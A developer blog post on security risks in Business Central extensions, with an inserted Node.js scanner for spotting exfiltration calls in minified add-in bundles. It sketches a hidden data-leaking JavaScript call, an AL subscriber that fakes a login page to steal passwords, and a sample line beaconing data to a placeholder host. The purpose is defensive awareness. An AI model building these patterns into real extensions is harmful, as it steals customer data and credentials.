Security in your Business Central extensions

I feel like this is the elephant in the room that everyone seems to ignore: how to make sure your Business Central extensions are secure. Ever since we moved to extensions our world has become so much bigger; we have APIs and we can call REST web services from AL. There are so many cool things available, and near unlimited possibilities for hackers to steal your data.

I got into a bit of a discussion with someone on LinkedIn after my recent post on React builds in Control Add-Ins. The heart of it was that compiled JavaScript can contain a multitude of nastiness that is near impossible to spot. This is true but it is also true of extensions. In this blog post I will give some examples of nastiness a careless or unscrupulous developer can create.

First things first, compiled JavaScript. Let’s say you ask someone to create a script for your Control Add-In. Let’s say that someone uses React and sends you a compiled script. Everything works, looks pretty and you are happy. However, this was added to your JavaScript:

window.InitControls = (myBCData) => {
 sendToMyHackerBuddies(myBCData);
 processInitControls(myBCData);
}

This, obviously, is a pretty hamfisted example. Easy to spot, right? Let’s have a look at the compiled code:

window.InitControls=function(e,n){sendToMyHackerBuddies(void 0),p(e)|

Just to give you some context, this particular file holds a single line of 3331 characters of nearly illegible JavaScript. It is impossible to find even this hamfisted example if you don’t know where to look. What if your developer decided to call a function in some piece of script someone posted somewhere? You simply won’t find it.
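One way to get a starting point in a single-line bundle like this, as an added example that is not part of the original post: a Node.js triage scan that reports every browser API able to send data out or load more code, with its offset in the line, plus every embedded host that is not on an allowlist. The sample bundle, the helper name q and the host collector.example.invalid are constructed for illustration.

```javascript
'use strict';

// Browser APIs that can send data off the page or pull in more code.
const SINKS = [
  ['fetch', /\bfetch\s*\(/g],
  ['XMLHttpRequest', /\bXMLHttpRequest\b/g],
  ['sendBeacon', /\bsendBeacon\s*\(/g],
  ['WebSocket', /\bWebSocket\b/g],
  ['EventSource', /\bEventSource\b/g],
  ['eval', /\beval\s*\(/g],
  ['Function constructor', /\bnew\s+Function\s*\(/g],
  ['script injection', /createElement\s*\(\s*["']script["']\s*\)/g],
];
// Absolute URLs embedded in the bundle; group 1 is the host name.
const URL_RE = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;

// Returns every sink hit (with its offset and surrounding text, so it can be
// found inside a single 3000-character line) and every host not on the allowlist.
function auditBundle(source, allowedHosts = []) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const sinks = [];
  for (const [name, re] of SINKS) {
    for (const m of source.matchAll(re)) {
      const from = Math.max(0, m.index - 30);
      sinks.push({ name, offset: m.index, context: source.slice(from, m.index + 50) });
    }
  }
  const unknownHosts = new Set();
  for (const m of source.matchAll(URL_RE)) {
    const host = m[1].toLowerCase();
    if (!allowed.has(host)) unknownHosts.add(host);
  }
  return { sinks, unknownHosts: [...unknownHosts].sort() };
}

// Constructed sample, not a real build: q() is the minified name of a helper
// that posts the add-in data to a placeholder host.
const SAMPLE_BUNDLE =
  'var t="http://www.w3.org/2000/svg";function p(e){document.title=e}' +
  'function q(e){navigator.sendBeacon("https://collector.example.invalid/c",JSON.stringify(e))}' +
  'window.InitControls=function(e,n){q(e),p(e)};';

console.log(JSON.stringify(auditBundle(SAMPLE_BUNDLE, ['www.w3.org']), null, 2));
```

A clean result is not proof of a clean bundle, because calls assembled at run time escape pattern matching; the scan only tells a reviewer where to start reading.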

Second example. You ask someone to create an extension for you. They build it, you test it, everything works, everyone happy right? But what if that developer added this event subscriber and then set ShowMyCode to false?

[EventSubscriber(ObjectType::Table, Database::Customer, 'OnAfterInsertEvent', '', true, true)]
 local procedure CustomerOnInsert(var Rec: Record Customer; RunTrigger: Boolean)
 var
   User: Record User;
   FakeLoginpage: Page "Fake Login Page";
   Password: Text;
 begin
   if User.Get(UserSecurityId()) then;
   FakeLoginpage.RunModal();
   Password := FakeLoginPage.GetPassword();
   SendToMyHackerBuddies(Rec, UserId, GetUrl(ClientType::Api), User."Authentication Email", Password);
 end;

Disaster, right? You are one phishing trip away from exposing your entire database to god knows who. What if you simply downloaded an extension someone posted somewhere thinking it would fix your problems?

Third scenario: you call a web service in order to find the weather conditions at your customer’s location. Instead of finding a premium trusted API you use the free service you find on webservice.weather.myfriendlyhacker.com/api. It will no doubt return perfectly valid weather data. It will also log all your data and sell it to the highest bidder.

I hope these simple scenarios make you think twice about trust and ease of development. Please remember that Business Central is probably not big enough to be targeted by the really really clever Internet criminals. That will change.

Now for the million dollar question. Will this stop me from using React front ends, extensions, and web services? Of course not. They bring us many good things. But I am mindful of who to trust. I don’t just add any old scripts to my front ends, and I certainly don’t send customer data to random web services.

To my fellow developers: your customers trust you to keep their data secure. Please be mindful of this and earn their trust.

To end users. There are a few simple ways of protecting yourselves.

  • Work only with developers that you know and trust
  • Never install extensions from untrusted sources
  • When you commission someone to create a per tenant extension insist that the source code is visible
  • Where possible insist that code is reviewed by an independent third party
  • Set up your security properly.
  • When in doubt, don’t.

What do you use to protect yourselves? Please let me know in the comments.


Published by René Brummel
